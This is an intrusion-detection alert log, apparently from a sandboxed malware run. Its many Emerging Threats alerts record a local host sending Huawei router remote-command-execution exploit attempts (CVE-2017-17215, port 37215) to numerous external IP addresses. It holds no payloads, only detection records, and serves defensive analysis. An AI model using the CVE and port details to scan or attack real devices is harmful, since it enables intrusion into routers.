                                            06/14/24-10:43:45.967537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353237215192.168.2.14156.181.220.191
                                            06/14/24-10:43:48.017894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286437215192.168.2.14197.112.93.246
                                            06/14/24-10:44:06.451340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030437215192.168.2.14156.103.162.225
                                            06/14/24-10:43:45.969511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854637215192.168.2.14197.244.93.20
                                            06/14/24-10:44:12.641352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364037215192.168.2.14156.104.164.186
                                            06/14/24-10:44:16.735486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286837215192.168.2.1441.245.46.27
                                            06/14/24-10:44:29.025819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291637215192.168.2.14156.190.46.229
                                            06/14/24-10:44:31.050718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812837215192.168.2.14197.82.68.137
                                            06/14/24-10:43:50.070971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5799237215192.168.2.1441.11.154.26
                                            06/14/24-10:43:45.988149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600237215192.168.2.14156.17.166.208
                                            06/14/24-10:43:52.143418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109637215192.168.2.14197.241.110.216
                                            06/14/24-10:43:45.969477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3391037215192.168.2.14197.152.232.19
                                            06/14/24-10:44:22.857683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998837215192.168.2.14197.178.172.89
                                            06/14/24-10:44:24.916616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190237215192.168.2.1441.41.177.221
                                            06/14/24-10:43:48.018435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853637215192.168.2.1441.136.9.74
                                            06/14/24-10:44:33.132529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615237215192.168.2.14156.31.103.89
                                            06/14/24-10:44:24.943937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002837215192.168.2.14197.217.249.152
                                            06/14/24-10:44:16.736475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5350237215192.168.2.14156.23.8.33
                                            06/14/24-10:44:18.777602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680637215192.168.2.14156.153.120.17
                                            06/14/24-10:44:04.421967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388437215192.168.2.14156.76.66.31
                                            06/14/24-10:43:39.809181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522237215192.168.2.14197.124.88.133
                                            06/14/24-10:43:50.075171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357637215192.168.2.14197.111.11.202
                                            06/14/24-10:43:54.184513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232637215192.168.2.1441.223.53.30
                                            06/14/24-10:44:22.862097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3560037215192.168.2.1441.66.182.230
                                            06/14/24-10:44:10.563158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216637215192.168.2.1441.128.68.122
                                            06/14/24-10:43:39.811765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081037215192.168.2.14197.23.179.245
                                            06/14/24-10:44:06.452380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991837215192.168.2.14156.108.75.128
                                            06/14/24-10:44:35.179844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324837215192.168.2.14197.57.195.73
                                            06/14/24-10:44:10.548117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613437215192.168.2.1441.58.226.201
                                            06/14/24-10:43:50.115571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458837215192.168.2.14197.70.22.3
                                            06/14/24-10:43:41.846308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016437215192.168.2.1441.208.18.167
                                            06/14/24-10:43:36.703900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655837215192.168.2.14156.57.82.86
                                            06/14/24-10:44:22.878448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479037215192.168.2.14197.47.102.166
                                            06/14/24-10:43:37.761827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824437215192.168.2.14156.194.92.153
                                            06/14/24-10:44:10.544925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4647037215192.168.2.14156.20.224.255
                                            06/14/24-10:44:10.563016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888037215192.168.2.14197.156.59.168
                                            06/14/24-10:44:08.518061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525837215192.168.2.14156.36.141.114
                                            06/14/24-10:43:34.678262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653437215192.168.2.1441.211.18.138
                                            06/14/24-10:44:27.000295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430237215192.168.2.14197.166.221.198
                                            06/14/24-10:43:39.811074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137037215192.168.2.14197.143.9.163
                                            06/14/24-10:44:22.862065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784837215192.168.2.14197.196.189.244
                                            06/14/24-10:43:52.143572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738637215192.168.2.14197.219.176.254
                                            06/14/24-10:44:27.001487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574837215192.168.2.1441.66.25.182
                                            06/14/24-10:44:00.321746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006037215192.168.2.14197.69.226.44
                                            06/14/24-10:44:14.668883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410637215192.168.2.14156.108.162.83
                                            06/14/24-10:44:04.420964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711237215192.168.2.1441.100.23.128
                                            06/14/24-10:44:04.423783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920437215192.168.2.14197.230.81.46
                                            06/14/24-10:43:48.018645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857637215192.168.2.14156.16.63.38
                                            06/14/24-10:43:58.276083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383837215192.168.2.14197.243.168.206
                                            06/14/24-10:44:18.777519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998237215192.168.2.14197.101.12.229
                                            06/14/24-10:43:39.789260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190037215192.168.2.14156.104.120.118
                                            06/14/24-10:44:08.501304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376437215192.168.2.1441.227.104.0
                                            06/14/24-10:44:10.566239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863037215192.168.2.14197.119.225.223
                                            06/14/24-10:44:08.520637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489037215192.168.2.14197.37.83.203
                                            06/14/24-10:43:48.022183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719637215192.168.2.1441.41.63.182
                                            06/14/24-10:43:43.972368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563637215192.168.2.14197.52.118.186
                                            06/14/24-10:44:12.616160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050037215192.168.2.1441.155.17.0
                                            06/14/24-10:44:00.340849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869637215192.168.2.14197.175.62.24
                                            06/14/24-10:43:39.790210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.14197.42.252.165
                                            06/14/24-10:44:18.766883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.14156.141.96.199
                                            06/14/24-10:43:58.292395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.1441.116.5.219
                                            06/14/24-10:44:20.804433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893637215192.168.2.1441.228.29.128
                                            06/14/24-10:44:20.827898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752637215192.168.2.14197.3.201.237
                                            06/14/24-10:43:45.966273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591037215192.168.2.14156.0.202.111
                                            06/14/24-10:43:58.294931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038837215192.168.2.1441.196.201.65
                                            06/14/24-10:43:48.045578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019037215192.168.2.1441.88.58.201
                                            06/14/24-10:43:56.250661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558037215192.168.2.1441.234.218.108
                                            06/14/24-10:43:36.722182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708037215192.168.2.14197.188.181.168
                                            06/14/24-10:44:04.410658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642637215192.168.2.14197.21.124.49
                                            06/14/24-10:44:02.368491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260637215192.168.2.14156.247.12.189
                                            06/14/24-10:44:06.469646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345837215192.168.2.14197.29.98.252
                                            06/14/24-10:44:12.646746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217037215192.168.2.1441.98.244.59
                                            06/14/24-10:44:33.132467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600637215192.168.2.14197.83.176.168
                                            06/14/24-10:44:08.520569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892037215192.168.2.1441.167.93.113
                                            06/14/24-10:43:36.705246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723237215192.168.2.14156.211.60.159
                                            06/14/24-10:44:06.473551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997837215192.168.2.14197.51.98.246
                                            06/14/24-10:44:08.520371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906637215192.168.2.1441.41.86.176
                                            06/14/24-10:43:52.150037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696037215192.168.2.14197.64.35.116
                                            06/14/24-10:44:02.384115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759837215192.168.2.1441.170.137.238
                                            06/14/24-10:44:33.149876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714037215192.168.2.1441.253.221.111
                                            06/14/24-10:43:54.183628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013837215192.168.2.14156.59.133.224
                                            06/14/24-10:44:00.335331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846037215192.168.2.14156.129.79.96
                                            06/14/24-10:44:22.861895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372437215192.168.2.14156.170.171.119
                                            06/14/24-10:44:33.150031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362837215192.168.2.14156.133.253.177
                                            06/14/24-10:44:18.765882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899037215192.168.2.14156.143.214.191
                                            06/14/24-10:44:16.734961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776037215192.168.2.14156.94.50.129
                                            06/14/24-10:44:10.546772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743037215192.168.2.1441.229.27.97
                                            06/14/24-10:44:18.766418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977037215192.168.2.14197.103.181.235
                                            06/14/24-10:43:43.970729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370437215192.168.2.14156.79.220.186
                                            06/14/24-10:43:58.274576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462437215192.168.2.14197.49.51.215
                                            06/14/24-10:44:08.519574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336637215192.168.2.14197.122.100.249
                                            06/14/24-10:43:48.019924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024437215192.168.2.1441.96.236.7
                                            06/14/24-10:43:58.277584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376037215192.168.2.1441.199.50.212
                                            06/14/24-10:43:48.031536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602037215192.168.2.14156.213.243.189
                                            06/14/24-10:44:14.666331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153437215192.168.2.1441.219.222.164
                                            06/14/24-10:44:20.804229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493837215192.168.2.14156.114.245.224
                                            06/14/24-10:44:26.998206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660237215192.168.2.14197.168.202.168
                                            06/14/24-10:44:29.010002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709237215192.168.2.1441.85.181.81
                                            06/14/24-10:44:14.670042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783037215192.168.2.14197.153.249.142
                                            06/14/24-10:43:36.727269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308637215192.168.2.14156.112.100.135
                                            06/14/24-10:44:29.024310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573837215192.168.2.14197.79.138.181
                                            06/14/24-10:44:26.977014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454237215192.168.2.14197.170.69.219
                                            06/14/24-10:43:58.292523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555237215192.168.2.14197.122.116.224
                                            06/14/24-10:44:26.979375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511437215192.168.2.1441.203.192.164
                                            06/14/24-10:44:31.055171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833637215192.168.2.14197.191.85.17
                                            06/14/24-10:44:10.563545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362637215192.168.2.1441.182.139.154
                                            06/14/24-10:43:58.289836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346237215192.168.2.14156.150.39.8
                                            06/14/24-10:43:52.146685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074237215192.168.2.14156.105.85.250
                                            06/14/24-10:44:06.450602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620037215192.168.2.1441.60.109.189
                                            06/14/24-10:44:08.504276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618437215192.168.2.14156.200.180.59
                                            06/14/24-10:43:39.790955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605037215192.168.2.1441.44.131.144
                                            06/14/24-10:44:08.503663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3943837215192.168.2.1441.127.158.229
                                            06/14/24-10:44:35.179113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689637215192.168.2.14197.7.69.66
                                            06/14/24-10:44:14.666788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968437215192.168.2.1441.95.246.187
                                            06/14/24-10:44:06.470383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040837215192.168.2.14156.59.25.206
                                            06/14/24-10:43:41.849887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530037215192.168.2.14197.67.213.250
                                            06/14/24-10:43:48.030255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701637215192.168.2.1441.17.65.99
                                            06/14/24-10:44:27.001829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546837215192.168.2.14156.169.164.146
                                            06/14/24-10:44:33.134949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129437215192.168.2.1441.86.94.77
                                            06/14/24-10:43:39.790177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742837215192.168.2.1441.119.137.77
                                            06/14/24-10:43:54.199854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351837215192.168.2.1441.154.203.196
                                            06/14/24-10:44:00.326490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566037215192.168.2.14197.58.81.34
                                            06/14/24-10:44:00.340295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140637215192.168.2.14197.31.154.62
                                            06/14/24-10:44:10.545577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675037215192.168.2.1441.144.212.251
                                            06/14/24-10:44:24.914348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909037215192.168.2.1441.230.22.35
                                            06/14/24-10:44:12.618521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327837215192.168.2.14156.36.213.235
                                            06/14/24-10:44:33.149934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901237215192.168.2.14156.127.151.154
                                            06/14/24-10:44:16.732903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729037215192.168.2.1441.201.197.233
                                            06/14/24-10:44:04.409600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153837215192.168.2.14156.249.142.224
                                            06/14/24-10:44:02.382949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607637215192.168.2.14156.11.66.89
                                            06/14/24-10:44:04.407184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400637215192.168.2.14156.232.22.63
                                            06/14/24-10:44:35.178912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332637215192.168.2.14156.202.200.12
                                            06/14/24-10:44:31.088990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373237215192.168.2.14197.58.152.245
                                            06/14/24-10:44:33.132379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139237215192.168.2.14197.28.50.253
                                            06/14/24-10:44:35.178015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783237215192.168.2.14197.147.180.66
                                            06/14/24-10:43:56.252964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846237215192.168.2.14197.50.146.53
                                            06/14/24-10:43:48.029789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636837215192.168.2.1441.35.94.148
                                            06/14/24-10:43:50.115741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964437215192.168.2.1441.134.170.222
                                            06/14/24-10:44:06.470727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599037215192.168.2.14156.3.219.252
                                            06/14/24-10:43:41.849569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797637215192.168.2.14197.127.207.155
                                            06/14/24-10:44:06.472725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941437215192.168.2.14197.217.162.70
                                            06/14/24-10:43:58.277655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212837215192.168.2.14197.126.241.87
                                            06/14/24-10:44:12.625500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397437215192.168.2.14197.55.81.76
                                            06/14/24-10:44:16.718923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3276837215192.168.2.14156.209.99.140
                                            06/14/24-10:43:36.702134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465037215192.168.2.14156.78.23.43
                                            06/14/24-10:44:26.986427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189837215192.168.2.14197.70.235.213
                                            06/14/24-10:43:56.250588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084437215192.168.2.14156.58.63.126
                                            06/14/24-10:43:54.186617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400037215192.168.2.14156.135.106.111
                                            06/14/24-10:44:33.133736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419037215192.168.2.14156.115.79.165
                                            06/14/24-10:44:31.084133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451837215192.168.2.14156.225.100.160
                                            06/14/24-10:44:22.879779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510437215192.168.2.14156.60.118.166
                                            06/14/24-10:43:56.226173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556237215192.168.2.1441.19.9.31
                                            06/14/24-10:44:33.151195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023237215192.168.2.14197.94.135.183
                                            06/14/24-10:43:45.987691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473437215192.168.2.14156.233.178.244
                                            06/14/24-10:44:00.341037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335837215192.168.2.14156.90.56.164
                                            06/14/24-10:43:48.028321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010637215192.168.2.14197.196.151.44
                                            06/14/24-10:43:41.896269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040437215192.168.2.14197.248.137.205
                                            06/14/24-10:44:12.644935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922837215192.168.2.14156.155.249.216
                                            06/14/24-10:44:16.718526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004437215192.168.2.14156.28.247.181
                                            06/14/24-10:43:39.791298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460837215192.168.2.1441.150.202.80
                                            06/14/24-10:43:39.812857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421237215192.168.2.14197.19.80.99
                                            06/14/24-10:43:34.661691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793637215192.168.2.14197.45.165.234
                                            06/14/24-10:44:06.449173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370037215192.168.2.1441.15.43.14
                                            06/14/24-10:44:04.421745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659037215192.168.2.14197.43.232.86
                                            06/14/24-10:43:56.253820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330437215192.168.2.14197.167.97.156
                                            06/14/24-10:44:20.831479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289037215192.168.2.1441.90.205.24
                                            06/14/24-10:43:48.018516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041237215192.168.2.1441.116.237.27
                                            06/14/24-10:43:58.276652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962237215192.168.2.1441.6.18.164
                                            06/14/24-10:44:02.365565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204437215192.168.2.1441.181.49.253
                                            06/14/24-10:43:43.942390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915237215192.168.2.14197.165.137.152
                                            06/14/24-10:43:50.074126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397637215192.168.2.1441.38.178.45
                                            06/14/24-10:44:02.368859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470037215192.168.2.14156.54.167.174
                                            06/14/24-10:44:06.471333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771237215192.168.2.1441.180.251.116
                                            06/14/24-10:43:58.277715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575237215192.168.2.14197.164.86.158
                                            06/14/24-10:44:10.545331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674437215192.168.2.14197.124.64.5
                                            06/14/24-10:44:06.448182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889837215192.168.2.14156.200.28.88
                                            06/14/24-10:44:27.001653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259637215192.168.2.14197.200.19.104
                                            06/14/24-10:43:36.728310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488437215192.168.2.14156.236.158.214
                                            06/14/24-10:43:58.275987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815437215192.168.2.14197.215.107.102
                                            06/14/24-10:44:14.683663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614637215192.168.2.14156.54.149.20
                                            06/14/24-10:44:02.381098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710837215192.168.2.1441.56.187.208
                                            06/14/24-10:44:16.715042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871837215192.168.2.14197.120.150.62
                                            06/14/24-10:44:22.878603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4647237215192.168.2.14156.39.10.157
                                            06/14/24-10:43:34.677238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204237215192.168.2.14197.75.24.151
                                            06/14/24-10:44:14.669537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535037215192.168.2.1441.139.109.2
                                            06/14/24-10:44:33.149583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191037215192.168.2.14156.92.133.19
                                            06/14/24-10:43:52.164703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113437215192.168.2.14197.138.254.255
                                            06/14/24-10:43:58.290738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248237215192.168.2.14197.67.242.174
